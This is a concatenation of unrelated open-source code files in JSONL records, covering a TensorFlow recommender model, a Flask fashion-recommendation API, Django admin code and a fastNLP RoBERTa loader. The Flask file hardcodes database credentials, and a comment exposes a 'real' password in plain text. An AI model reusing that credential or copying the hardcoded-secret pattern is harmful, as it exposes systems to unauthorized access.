FGroup.USER: user_cat_cols,\n FGroup.ITEM: item_cat_cols,\n FGroup.CONTEXT: context_cat_cols,\n }\n 
self.interaction_type = interaction_type\n self.num_meta = {}\n\n def forward(self, input_xn_d: Dict[str, tf.Tensor]) -> tf.Tensor:\n \"\"\"Forward inference step to score a user-item interaction\n \n Args:\n input_xn_d: Dictionary of feature names to category codes\n for a single interaction\n\n Returns:\n Forward inference scoring operation\n\n \"\"\"\n\n # Handle sparse (embedding lookup of categorical features)\n embs_by_group, biases = self.embedding_map.look_up(\n input_xn_d, self.cat_cols)\n embs_all = ChainMap(*embs_by_group.values())\n\n fields_d = {\n fg: self.cat_cols[fg]\n for fg in [FGroup.USER, FGroup.ITEM, FGroup.CONTEXT]\n }\n\n interaction_sets = preset_interactions(\n fields_d, interaction_type=self.interaction_type)\n\n with tf.name_scope('interactions'):\n contrib_dot = kernel_via_xn_sets(interaction_sets, embs_all)\n # bias for cat feature factors\n contrib_bias = tf.add_n(list(biases.values()), name='contrib_bias')\n\n score = tf.add_n([contrib_dot, contrib_bias], name='score')\n\n return score\n\n\nclass BilinearNetWithNum(BilinearNet):\n \"\"\"Forward inference step to score a user-item interaction\n With the ability to handle numerical (visual) features based on [1]_\n\n Args:\n embedding_map:Variables and metadata concerning categorical embeddings\n num_meta: Metadata concerning numerical data\n `feature_name -> dimensionality of input`\n l2_vis: l2 regularization scale for visual embedding matrix\n ruin: If True, use the formulation of [1]_\n Else, use a modified formulation\n interaction_type: Type of preset interaction\n One of {'intra', 'inter'}\n\n References:\n .. [1] He, Ruining, and Julian McAuley. \"VBPR: Visual Bayesian \n Personalized Ranking from Implicit Feedback.\" AAAI. 2016.\n\n \"\"\"\n def __init__(self,\n embedding_map: EmbeddingMap,\n user_cat_cols: List[str],\n item_cat_cols: List[str],\n context_cat_cols: List[str],\n interaction_type: str = 'inter',\n num_meta: Dict[str, int] = None,\n l2_vis: float = 0.,\n ruin: bool = True,\n ):\n BilinearNet.__init__(self, embedding_map,\n user_cat_cols,\n item_cat_cols,\n context_cat_cols,\n interaction_type)\n\n self.ruin = ruin\n self.num_meta = num_meta or {}\n # Params for numerical features\n # embedding matrix for each numerical feature (fully connected layer)\n self.l2_vis = l2_vis\n self.W_fc_num_d = {}\n self.b_fc_num_d = {} # bias for fully connected\n self.b_num_factor_d = {}\n self.b_num_d = {} # vbpr paper uses this shady bias matrix (beta')\n with tf.name_scope('numerical_reduction'):\n\n self.reg_vis = tf.contrib.layers.l2_regularizer(scale=self.l2_vis)\n K2 = self.embedding_map.embedding_dim\n for feat_name, dim_numerical in self.num_meta.items():\n # vbpr: E\n self.W_fc_num_d[feat_name] = tf.get_variable(\n name=f'{feat_name}_fc_embedder',\n shape=[dim_numerical, K2],\n initializer=tf.random_normal_initializer(\n stddev=1. / dim_numerical),\n regularizer=self.reg_vis,\n )\n if not self.ruin:\n # bias for E (not in paper)\n self.b_fc_num_d[feat_name] = tf.get_variable(\n name=f'{feat_name}_fc_bias',\n shape=[self.embedding_map.embedding_dim],\n initializer=tf.zeros_initializer(),\n )\n # just a scalar\n self.b_num_factor_d[feat_name] = tf.get_variable(\n name=f'{feat_name}_bias',\n shape=[1],\n initializer=tf.zeros_initializer(),\n )\n else:\n # vbpr: beta'\n self.b_num_d[feat_name] = tf.get_variable(\n name=f'{feat_name}_beta_prime',\n shape=[dim_numerical],\n initializer=tf.random_normal_initializer(\n stddev=1. 
/ dim_numerical),\n regularizer=self.reg_vis,\n )\n\n def forward(self, input_xn_d: Dict[str, tf.Tensor]) -> tf.Tensor:\n \"\"\"Forward inference step to score a user-item interaction\n \n Args:\n input_xn_d: Dictionary of feature names to category codes\n for a single interaction\n\n Returns:\n Forward inference scoring operation\n\n \"\"\"\n\n # Handle sparse (embedding lookup of categorical features)\n embs_by_group, biases = self.embedding_map.look_up(\n input_xn_d, self.cat_cols)\n\n if self.embedding_map.vis_emb_user_col:\n emb_user_vis = tf.nn.embedding_lookup(\n self.embedding_map.user_vis,\n input_xn_d[self.embedding_map.vis_emb_user_col],\n name='user_vis_emb')\n else:\n emb_user_vis = None\n\n # Handle dense (fully connected reduction of dense features)\n # TODO: assume for now that all num feats are item-related\n # (else, need extra book-keeping)\n user_num_cols = []\n if self.ruin:\n item_num_cols = []\n else:\n item_num_cols = list(self.num_meta.keys())\n if self.ruin:\n num_emb_d = {\n feat_name: tf.matmul( # vbpr: theta_i\n input_xn_d[feat_name], self.W_fc_num_d[feat_name],\n name='item_vis_emb')\n # + self.b_fc_num_d[feat_name] # fc bias (not in vbpr paper)\n for feat_name in self.num_meta.keys()\n }\n else:\n num_emb_d = {\n feat_name: tf.matmul( # vbpr: theta_i\n input_xn_d[feat_name], self.W_fc_num_d[feat_name],\n name='item_vis_emb')\n + self.b_fc_num_d[feat_name] # fc bias (not in vbpr paper)\n for feat_name in self.num_meta.keys()\n }\n\n # TODO: temp assume num are item features (not vbpr)\n embs_by_group[FGroup.ITEM].update(num_emb_d)\n\n embs_all = ChainMap(*embs_by_group.values())\n\n fields_d = {\n FGroup.USER:\n self.cat_cols[FGroup.USER] + user_num_cols,\n FGroup.ITEM:\n self.cat_cols[FGroup.ITEM] + item_num_cols,\n }\n\n interaction_sets = preset_interactions(\n fields_d, interaction_type=self.interaction_type)\n\n with tf.name_scope('interactions'):\n contrib_dot = kernel_via_xn_sets(interaction_sets, embs_all)\n # bias for cat feature factors\n if len(biases.values()):\n contrib_bias = tf.add_n(list(biases.values()),\n name='contrib_bias')\n else:\n contrib_bias = tf.zeros_like(contrib_dot,\n name='contrib_bias')\n\n if self.b_num_factor_d.values():\n # bias for num feature factors\n contrib_bias += tf.add_n(list(self.b_num_factor_d.values()))\n # NOTE: vbpr paper uses a bias matrix beta that we take a\n # dot product with original numerical\n if self.b_num_d:\n contrib_vis_bias = tf.add_n( # vbpr: beta * f\n [tf.reduce_sum(\n tf.multiply(input_xn_d[feat_name],\n self.b_num_d[feat_name]),\n 1, keep_dims=False\n ) for feat_name in self.num_meta.keys()],\n name='contrib_vis_bias'\n )\n else:\n contrib_vis_bias = tf.zeros_like(contrib_bias,\n name='contrib_vis_bias')\n\n # TODO: manually create visual interaction\n if len(num_emb_d):\n contrib_vis_dot = tf.add_n([\n tf.reduce_sum(\n # theta_u.T * theta_i\n tf.multiply(emb_user_vis, num_emb), 1, keep_dims=False)\n for feat_name, num_emb in num_emb_d.items()\n ], name='contrib_vis_dot')\n else:\n contrib_vis_dot = tf.zeros_like(contrib_bias,\n name='contrib_vis_dot')\n\n score = tf.add_n([contrib_dot,\n contrib_bias,\n contrib_vis_dot,\n contrib_vis_bias],\n name='score')\n return score\n\n\nclass BilinearNetWithNumFC(BilinearNet):\n \"\"\"POC to replace the inner product potion with FC layers as described in\n [2]_ and [3]_\n\n Args:\n embedding_map: Variables and metadata concerning categorical embeddings\n num_meta: Metadata concerning numerical data\n `feature_name -> dimensionality of input`\n 
interaction_type: Type of preset interaction\n One of {'intra', 'inter'}\n deep_net_fn: function to create deep portion of network\n deep_reg: regularizer for deep portion of network\n\n References:\n .. [2] He, Xiangnan, et al. \"Neural collaborative filtering.\" \n Proceedings of the 26th International Conference on World Wide \n Web. International World Wide Web Conferences Steering \n Committee, 2017.\n \n .. [3] Xiangnan He and Tat-Seng Chua (2017). Neural Factorization \n Machines for Sparse Predictive Analytics. In Proceedings of \n SIGIR '17, Shinjuku, Tokyo, Japan, August 07-11, 2017.\n \"\"\"\n\n def __init__(self,\n embedding_map: EmbeddingMap,\n user_cat_cols: List[str],\n item_cat_cols: List[str],\n context_cat_cols: List[str],\n interaction_type: str = 'inter',\n num_meta: Dict[str, int] = None,\n deep_net_fn: Callable = simple_fc,\n deep_reg=None,\n ):\n BilinearNet.__init__(self, embedding_map,\n user_cat_cols,\n item_cat_cols,\n context_cat_cols,\n interaction_type)\n\n self.num_meta = num_meta or {}\n self.deep_net_fn = deep_net_fn\n self.deep_reg = deep_reg\n\n def forward(self, input_xn_d: Dict[str, tf.Tensor]) -> tf.Tensor:\n \"\"\"Forward inference step to score a user-item interaction\n \n Args:\n input_xn_d: Dictionary of feature names to category codes\n for a single interaction\n\n Returns:\n Forward inference scoring operation\n\n \"\"\"\n\n # Handle sparse (embedding lookup of categorical features)\n embs_by_group, biases = self.embedding_map.look_up(\n input_xn_d, self.cat_cols)\n\n num_emb_d = {\n feat_name: input_xn_d[feat_name]\n for feat_name in self.num_meta.keys()\n }\n\n embs_all = ChainMap(*embs_by_group.values(), num_emb_d)\n\n fields_d = {\n fg: self.cat_cols[fg]\n for fg in [FGroup.USER, FGroup.ITEM, FGroup.CONTEXT]\n }\n\n interaction_sets = preset_interactions(\n fields_d, interaction_type=self.interaction_type)\n\n with tf.name_scope('interactions'):\n xn_muls = muls_via_xn_sets(interaction_sets, embs_all)\n # Bi-Interaction (actually, we allow for >=2 interactions)\n f_bi = tf.add_n([node for s, node in xn_muls.items()\n if len(s) > 1],\n name='f_bi')\n\n contrib_deep = tf.identity(\n self.deep_net_fn(f_bi, self.deep_reg, scope_name='deep'),\n name='contrib_deep')\n contrib_bias = tf.add_n(list(biases.values()), name='contrib_bias')\n\n score = tf.add_n([contrib_deep, contrib_bias], name='score')\n\n return score\n\n","repo_name":"JasonTam/tophat","sub_path":"tophat/nets/bilinear.py","file_name":"bilinear.py","file_ext":"py","file_size_in_byte":13786,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"34674071008","text":"import sys, math\nfrom collections import deque\n\ninput = sys.stdin.readline\nINF = sys.maxsize\n\n\ndef solve():\n n, k = map(int, input().split())\n dp = [[0 if i != 0 else 1 for i in range(k + 1)] for _ in range(n + 1)]\n\n for i in range(1, n + 1):\n cnt = int(input())\n for j in range(1, k + 1):\n dp[i][j] = dp[i - 1][j] + dp[i][j - cnt]\n\n print(dp[n][k])\n\n\nif __name__ == \"__main__\":\n solve()\n","repo_name":"kkIIun/Tobigs18_assignment","sub_path":"week5/Algorithm/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17736445659","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport os\nimport re\nimport sys\n\nWHISKEY_HOMEDIR = os.environ['WHISKEY_HOMEDIR']\nWHISKEY_DOTDIR = os.path.join(WHISKEY_HOMEDIR, 
'.whiskey')\n\nCONFIG_FILE = os.path.join(WHISKEY_HOMEDIR,\n '.whiskey/apache/build/config_vars.mk')\n\nCONFIG = {}\n\nwith open(CONFIG_FILE) as fp:\n for line in fp.readlines():\n name, value = line.split('=', 1)\n name = name.strip()\n value = value.strip()\n CONFIG[name] = value\n\n_varprog = re.compile(r'\\$(\\w+|(?:\\{[^}]*\\}|\\([^)]*\\)))')\n\ndef expand_vars(value):\n if '$' not in value:\n return value\n\n i = 0\n while True:\n m = _varprog.search(value, i)\n if not m:\n break\n i, j = m.span(0)\n name = m.group(1)\n if name.startswith('{') and name.endswith('}'):\n name = name[1:-1]\n elif name.startswith('(') and name.endswith(')'):\n name = name[1:-1]\n if name in CONFIG:\n tail = value[j:]\n value = value[:i] + CONFIG.get(name, '')\n i = len(value)\n value += tail\n else:\n i = j\n\n return value\n\ndef get_vars(name):\n value = CONFIG.get(name, '')\n sub_value = expand_vars(value)\n while value != sub_value:\n value = sub_value\n sub_value = expand_vars(value)\n return sub_value.replace('/app/.whiskey', WHISKEY_DOTDIR)\n\nCONFIG['PREFIX'] = get_vars('prefix')\nCONFIG['TARGET'] = get_vars('target')\nCONFIG['SYSCONFDIR'] = get_vars('sysconfdir')\nCONFIG['INCLUDEDIR'] = get_vars('includedir')\nCONFIG['LIBEXECDIR'] = get_vars('libexecdir')\nCONFIG['BINDIR'] = get_vars('bindir')\nCONFIG['SBINDIR'] = get_vars('sbindir')\nCONFIG['PROGNAME'] = get_vars('progname')\n\n_CFLAGS_NAMES = ['SHLTCFLAGS', 'CFLAGS', 'NOTEST_CPPFLAGS',\n 'EXTRA_CPPFLAGS', 'EXTRA_CFLAGS']\n\n_CFLAGS_VALUES = []\n\nfor name in _CFLAGS_NAMES:\n value = get_vars(name)\n if value:\n _CFLAGS_VALUES.append(value)\n\nCONFIG['CFLAGS'] = ' '.join(_CFLAGS_VALUES)\n\nif sys.argv[1] == '-q':\n print(get_vars(sys.argv[2]))\n","repo_name":"GrahamDumpleton-abandoned/mod_wsgi-openshift","sub_path":"apxs.py","file_name":"apxs.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16159196436","text":"import os\r\nimport connexion\r\nfrom flask import Response\r\n\r\nbasedir = os.path.abspath(os.path.dirname(__file__))\r\n\r\nconnex_app = connexion.App(__name__,specification_dir=basedir)\r\n\r\nconnex_app.add_api(\"taxiAPI.yaml\")\r\n\r\nconnex_app.route(\"/health\",methods=[\"GET\"])\r\nconnex_app.route(\"/analysis/provider/{p_id}/analytics/{c_name}\",methods=[\"GET\"])\r\n\r\nconnex_app.route(\"/analysis/provider/{p_id}/stats/{c_name}\", methods=[\"GET\"])\r\nif __name__ == '__main__':\r\n\tconnex_app.run(debug=True, host='0.0.0.0',port=8080,use_reloader=False)\r\n","repo_name":"cmcs200/CN_Project_Group12","sub_path":"analytics_stats/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"6268289801","text":"\"\"\"Testing tokenizers in the nlp.py module.\n\"\"\"\nfrom florabert import config, nlp\n\n\ndef test_dnabert_tokenizer():\n ex_seq = \"AAATCGTCGCGGGCGCTCGCTATATATCGGCTAGCTAACTCGCCCG\"\n tokenizer = nlp.DNABERTTokenizer.from_pretrained(\n config.models / \"dnabert\" / \"tokenizer\", k=6, max_len=512\n )\n tokenized = tokenizer(ex_seq)\n decoded = tokenizer.decode(ex_seq[\"input_ids\"])\n\n assert (\n ex_seq == decoded\n ), f\"Input ({ex_seq}) does not match decoded sequence 
({decoded}).\"\n","repo_name":"benlevyx/florabert","sub_path":"tests/test_module/test_tokenizers.py","file_name":"test_tokenizers.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"14487417925","text":"\nfrom django.contrib import admin\nfrom rent_app.models import Boot_directory,Ski_directory,Subsc_directory, Resort_directory,Resort_contact,WeatherModel\nfrom django.contrib.gis.admin import OSMGeoAdmin\n\n#Other admin page URL = 'http://127.0.0.1:8000/rent_admin/ >\n\nclass RentAdminArea(admin.AdminSite):\n site_header = \"Rent Admin Area\"\nrent_admin = RentAdminArea(name='RentAdmin')\n\nclass SubscAdmin(admin.ModelAdmin):\n list_display = ('resort_subsc','subscription','cost_subscr')\nrent_admin.register(Subsc_directory,SubscAdmin)\n\n#<\n\n\nadmin.site.register(Subsc_directory,SubscAdmin)\nclass SkiAdmin(admin.ModelAdmin):\n list_display = ('resort_ski', 'ski_size')\nrent_admin.register(Ski_directory, SkiAdmin)\n\n@admin.register(Boot_directory)\nclass Boot_admin(admin.ModelAdmin):\n list_display = ('boots_size','boots_count','boots_rent_cost')\n\n@admin.register(Ski_directory)\nclass SkiAdmin(admin.ModelAdmin):\n list_display = ('ski_size','ski_count','ski_rent_cost')\n\n@admin.register(Resort_directory)\nclass ResortAdmin(admin.ModelAdmin):\n list_display = ('resort_name','resort_address')\n@admin.register(Resort_contact)\nclass ResortAdmin(OSMGeoAdmin):\n list_display = ('id','contact_phone')\n\n\n@admin.register(WeatherModel)\nclass WeatherAdmin(admin.ModelAdmin):\n list_display = ('resort_address','description','temp')","repo_name":"Algalyq/test_app","sub_path":"mobile_project/rent_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25864670885","text":"#Imports\nfrom flask import Flask, request\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport json\nfrom sqlalchemy import create_engine\nfrom apis.fetch_visualize_user_data import get_all_charts, get_userid, get_piecharts_data\nfrom apis.fetch_user_recommendations import get_user_recommendations, fetch_user_purchased_products, get_usernames\nfrom apis.TopN import get_topN_products,get_topN_attributes\nfrom apis.monthly_trend import get_category_trend, get_artist_trend, get_product_trend, get_product_names\nfrom flask_cors import CORS, cross_origin\n\n# create sqlalchemy engine and connect to local database\n#Caution: Do not keep special characters in password or db name \n\nengine = create_engine(\"mysql+pymysql://{user}:{pw}@localhost/{db}\"\n .format(user=\"nodejs\",\n pw=\"mysql\", #real password is span@123, but url encoded password is required\n db=\"fashionDB\"))\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/personalization', methods=['POST'])\ndef user_personalization():\n \"\"\"\n request_format:\n {\n \"func\": string #(one of 'get_all_charts' or 'get_user_recommendations')\n \"user_id\" : int #(currently 1,2,..,30 is valid range)\n }\n\n response:\n if \"func\" == \"get_all_charts\"\n response = {\n \"func\": \"get_all_charts\",\n \"data\": {\n \"image_1\": image path,\n \"image_2\": image path,\n \"image_3\": image path\n }\n }\n if \"func\" == \"get_user_recommendations\\\"\n response = {\n \"func\": \"get_user_recommendations\\\",\n \"data\": [{\n \"product_id\": int,\n \"category\": string,\n \"artist\": string,\n \"theme\": string,\n 
\"img_path\": string (image path )\n },\n {\n \"product_id\": int,\n \"category\": string,\n \"artist\": string,\n \"theme\": string,\n \"img_path\": string (image path )\n },\n so on... upto 5 products\n ]\n \"\"\"\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n json_dict = request.json\n print(json_dict)\n functionality=json_dict['func']\n #user_id=int(json_dict['user_id'])\n username=json_dict['username']\n user_id=get_userid(username)\n #if functionality=='get_all_charts': \n if functionality=='get_piecharts_data': \n #response_dict={'func':'get_all_charts'}\n #response_dict['data']=get_all_charts(user_id)\n #response=get_all_charts(user_id)\n response=get_piecharts_data(user_id)\n #return json.dumps(response_dict)\n return json.dumps(response)\n elif functionality=='get_user_recommendations':\n #response_dict={'func':'get_user_recommendations'}\n #response_dict['data']=get_user_recommendations(user_id)\n response=get_user_recommendations(user_id)\n #return json.dumps(response_dict)\n return json.dumps(response)\n #return json_dict\n elif functionality=='get_user_products':\n response=fetch_user_purchased_products(user_id)\n return json.dumps(response)\n elif functionality=='get_usernames':\n print(\"getting all usernames\")\n response=get_usernames()\n print(type(response))\n return json.dumps(response)\n else:\n return 'Invalid request!'\n\n else:\n return 'Content-Type not supported!'\n\n# @app.route('/trending', methods=['POST'])\n# def website_trend():\n# \"\"\"\n# request format:\n# {\n# \"func\":\"get_topN_products\" or get_topN_attributes\n# }\n\n# response format:\n# for func=\"get_topN_products\"\n# [{\n# \"product_id\": int,\n# \"category\": string,\n# \"artist\": string,\n# \"theme\": string,\n# \"img_path\": string (image path )\n# },\n# {\n# \"product_id\": int,\n# \"category\": string,\n# \"artist\": string,\n# \"theme\": string,\n# \"img_path\": string (image path )\n# },\n# so on... 
upto 5 products\n# ]\n\n# for func=\"get_topN_attributes\"\n# {\n# \"category\": [\n# {\n# \"category_id\": int,\n# \"category\": string,\n# \"total_quantity\": int\n# },\n# and so on...\n# ]\n# ,\n# \"artist\": [\n# {\n# \"artist_id\": int,\n# \"artist\": string,\n# \"total_quantity\": int\n# },\n# and so on...\n# ],\n# \"theme\": [\n# {\n# \"theme_id\": int,\n# \"theme\": string,\n# \"total_quantity\": int\n# },\n# and so on...\n# ]\n# }\n\n# \"\"\"\n# content_type = request.headers.get('Content-Type')\n# if (content_type == 'application/json'):\n# json_dict = request.json\n# functionality=json_dict['func']\n# #user_id=int(json_dict['user_id'])\n\n# if functionality=='get_topN_products': \n# #response_dict={'title':'Top Products'}\n# #response_dict['data']=get_topN_products(N=5)\n# response=get_topN_products(N=5)\n# #return json.dumps(response_dict)\n# return json.dumps(response)\n\n# elif functionality=='get_topN_attributes':\n# #response_dict={'func':'get_topN_attributes'}\n# category_array,artist_array,themes_array=get_topN_attributes(N=3)\n# # data_dict={\n# # \"category\":{\"title\":\"Top Categories\",\"data\":category_array},\n# # \"artist\":{\"title\":\"Top Artists\",\"data\":artist_array},\n# # \"theme\": {\"title\":\"Top Artists\",\"data\":themes_array}\n# # }\n# data_dict={\n# \"category\":category_array,\n# \"artist\":artist_array,\n# \"theme\":themes_array\n# }\n# #response_dict['data']=data_dict\n# response=data_dict\n# #return json.dumps(response_dict)\n# return json.dumps(response) \n# else:\n# return 'Invalid request!'\n\n# else:\n# return 'Content-Type not supported!'\n\n@app.route('/trending', methods=['POST'])\ndef website_trend():\n \"\"\"\n request format:\n {\n \"func\":\"get_topN_products\" or get_topN_attributes\n }\n\n response format:\n for func=\"get_topN_products\"\n [{\n \"product_id\": int,\n \"category\": string,\n \"artist\": string,\n \"theme\": string,\n \"img_path\": string (image path )\n },\n {\n \"product_id\": int,\n \"category\": string,\n \"artist\": string,\n \"theme\": string,\n \"img_path\": string (image path )\n },\n so on... 
upto 5 products\n ]\n\n for func=\"get_topN_attributes\"\n {\n \"category\": [\n {\n \"category_id\": int,\n \"category\": string,\n \"total_quantity\": int\n },\n and so on...\n ]\n ,\n \"artist\": [\n {\n \"artist_id\": int,\n \"artist\": string,\n \"total_quantity\": int\n },\n and so on...\n ],\n \"theme\": [\n {\n \"theme_id\": int,\n \"theme\": string,\n \"total_quantity\": int\n },\n and so on...\n ]\n }\n\n \"\"\"\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n json_dict = request.json\n functionality=json_dict['func']\n #user_id=int(json_dict['user_id'])\n\n if functionality=='get_topN_products': \n #response_dict={'title':'Top Products'}\n #response_dict['data']=get_topN_products(N=5)\n response=get_topN_products(N=5)\n #return json.dumps(response_dict)\n return json.dumps(response)\n\n elif functionality=='get_topN_attributes':\n #response_dict={'func':'get_topN_attributes'}\n category_array,artist_array,themes_array=get_topN_attributes(N=3)\n # data_dict={\n # \"category\":{\"title\":\"Top Categories\",\"data\":category_array},\n # \"artist\":{\"title\":\"Top Artists\",\"data\":artist_array},\n # \"theme\": {\"title\":\"Top Artists\",\"data\":themes_array}\n # }\n data_dict={\n \"category\":category_array,\n \"artist\":artist_array,\n \"theme\":themes_array\n }\n #response_dict['data']=data_dict\n response=data_dict\n #return json.dumps(response_dict)\n return json.dumps(response) \n \n else:\n return 'Invalid request!'\n\n else:\n return 'Content-Type not supported!'\n\n@app.route('/about_project', methods=['GET'])\ndef about_project():\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n img_dir=\"/home/spanidea-168/Documents/SpanIdea_Office_work/Fashion_recommendation_prototype/latex\"\n #img_dir=\"img\"\n image1_path=f\"{img_dir}/mathematical_equation.png\"\n image2_path=f\"{img_dir}/attribute_considered.png\"\n return json.dumps([image1_path,image2_path])\n #img/attribute_considered.jpg\n else:\n return 'Content-Type not supported!' \n\n@app.route('/client')\ndef client():\n ip_addr = request.environ['REMOTE_ADDR']\n return '
Your IP address is:' + ip_addr\n\n\n@app.route('/home', methods=['POST'])\ndef get_usernames_route():\n \"\"\"\n request format:\n {\n \"func\":\"get_usernames\" \n }\n\n response format:\n for func=\"get_usernamess\"\n [{\n \"index\": int,\n \"username\": string,\n },\n {\n \"index\": int,\n \"username\": string,\n },\n so on... all usernames\n ]\n \"\"\"\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n json_dict = request.json\n functionality=json_dict['func']\n #user_id=int(json_dict['user_id'])\n\n if functionality=='get_usernames': \n #response_dict={'title':'Top Products'}\n #response_dict['data']=get_topN_products(N=5)\n response=get_usernames()\n #return json.dumps(response_dict)\n return json.dumps(response)\n else:\n return 'Invalid request!'\n\n else:\n return 'Content-Type not supported!'\n\n\n@app.route('/productData', methods=['POST'])\ndef get_all_product_names():\n # print(\"getting products\")\n \"\"\"\n request format:\n {\n \"func\":\"get_products\" \n }\n\n response format:\n for func=\"get_product_names\"\n [{\n \"index\": int,\n \"product_name\": string,\n \"product_id\": int,\n },\n {\n \"index\": int,\n \"product_name\": string,\n \"product_id\": int,\n },\n so on... all products\n ]\n \"\"\"\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n json_dict = request.json\n functionality=json_dict['func']\n #user_id=int(json_dict['user_id'])\n\n if functionality=='get_products': \n #response_dict={'title':'Top Products'}\n #response_dict['data']=get_topN_products(N=5)\n response=get_product_names()\n #return json.dumps(response_dict)\n return json.dumps(response)\n else:\n return 'Invalid request!'\n\n else:\n return 'Content-Type not supported!'\n\n@app.route('/monthly-trend', methods=['POST'])\ndef monthly_trend():\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n json_dict = request.json\n functionality=json_dict['func']\n if functionality=='get_category_trend':\n category=json_dict['category']\n response=get_category_trend(category)\n return json.dumps(response)\n \n elif functionality=='get_artist_trend':\n artist=json_dict['artist']\n response=get_artist_trend(artist)\n return json.dumps(response)\n elif functionality=='get_product_trend':\n prod_id=json_dict['product_id']\n response=get_product_trend(prod_id)\n return json.dumps(response)\n \n else:\n return 'Content-Type not supported!'\n\n\n","repo_name":"ps428/Fashion-Recommendation-Website","sub_path":"apis/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":13262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12302817998","text":"\nr\"\"\"undocumented\n这个页面的代码很大程度上参考(复制粘贴)了https://github.com/huggingface/pytorch-pretrained-BERT的代码, 如果你发现该代码对你\n 有用,也请引用一下他们。\n\"\"\"\n\n__all__ = [\n 'RobertaModel'\n]\n\nimport torch\nimport torch.nn as nn\n\nfrom .bert import BertEmbeddings, BertModel, BertConfig\nfrom fastNLP.io.file_utils import _get_file_name_base_on_postfix\nfrom ...io.file_utils import _get_roberta_dir\nfrom ...core import logger\n\nPRETRAINED_ROBERTA_POSITIONAL_EMBEDDINGS_SIZES = {\n \"roberta-base\": 512,\n \"roberta-large\": 512,\n \"roberta-large-mnli\": 512,\n \"distilroberta-base\": 512,\n \"roberta-base-openai-detector\": 512,\n \"roberta-large-openai-detector\": 512,\n}\n\n\nclass RobertaEmbeddings(BertEmbeddings):\n \"\"\"\n Same as BertEmbeddings with a tiny tweak for 
positional embeddings indexing.\n \"\"\"\n\n def __init__(self, config):\n super().__init__(config)\n self.padding_idx = 1\n self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=self.padding_idx)\n self.position_embeddings = nn.Embedding(\n config.max_position_embeddings, config.hidden_size, padding_idx=self.padding_idx\n )\n\n def forward(self, input_ids, token_type_ids, words_embeddings=None):\n position_ids = self.create_position_ids_from_input_ids(input_ids)\n\n return super().forward(\n input_ids, token_type_ids=token_type_ids, position_ids=position_ids, words_embeddings=words_embeddings\n )\n\n def create_position_ids_from_input_ids(self, x):\n \"\"\" Replace non-padding symbols with their position numbers. Position numbers begin at\n padding_idx+1. Padding symbols are ignored. This is modified from fairseq's\n `utils.make_positions`.\n\n :param torch.Tensor x:\n :return torch.Tensor:\n \"\"\"\n mask = x.ne(self.padding_idx).long()\n incremental_indicies = torch.cumsum(mask, dim=1) * mask\n return incremental_indicies + self.padding_idx\n\n\nclass RobertaModel(BertModel):\n r\"\"\"\n undocumented\n \"\"\"\n\n def __init__(self, config):\n super().__init__(config)\n\n self.embeddings = RobertaEmbeddings(config)\n self.apply(self.init_bert_weights)\n\n @classmethod\n def from_pretrained(cls, model_dir_or_name, *inputs, **kwargs):\n state_dict = kwargs.get('state_dict', None)\n kwargs.pop('state_dict', None)\n kwargs.pop('cache_dir', None)\n kwargs.pop('from_tf', None)\n\n # get model dir from name or dir\n pretrained_model_dir = _get_roberta_dir(model_dir_or_name)\n\n # Load config\n config_file = _get_file_name_base_on_postfix(pretrained_model_dir, 'config.json')\n config = BertConfig.from_json_file(config_file)\n\n # Load model\n if state_dict is None:\n weights_path = _get_file_name_base_on_postfix(pretrained_model_dir, '.bin')\n state_dict = torch.load(weights_path, map_location='cpu')\n else:\n logger.error(f'Cannot load parameters through `state_dict` variable.')\n raise RuntimeError(f'Cannot load parameters through `state_dict` variable.')\n\n # Instantiate model.\n model = cls(config, *inputs, **kwargs)\n\n missing_keys = []\n unexpected_keys = []\n error_msgs = []\n\n # Convert old format to new format if needed from a PyTorch state_dict\n old_keys = []\n new_keys = []\n for key in state_dict.keys():\n new_key = None\n if \"gamma\" in key:\n new_key = key.replace(\"gamma\", \"weight\")\n if \"beta\" in key:\n new_key = key.replace(\"beta\", \"bias\")\n if new_key:\n old_keys.append(key)\n new_keys.append(new_key)\n for old_key, new_key in zip(old_keys, new_keys):\n state_dict[new_key] = state_dict.pop(old_key)\n\n # copy state_dict so _load_from_state_dict can modify it\n metadata = getattr(state_dict, \"_metadata\", None)\n state_dict = state_dict.copy()\n if metadata is not None:\n state_dict._metadata = metadata\n\n # PyTorch's `_load_from_state_dict` does not copy parameters in a module's descendants\n # so we need to apply the function recursively.\n def load(module: nn.Module, prefix=\"\"):\n local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})\n module._load_from_state_dict(\n state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs,\n )\n for name, child in module._modules.items():\n if child is not None:\n load(child, prefix + name + \".\")\n\n # Make sure we are able to load base models as well as derived models (with heads)\n start_prefix = \"\"\n model_to_load = model\n if not 
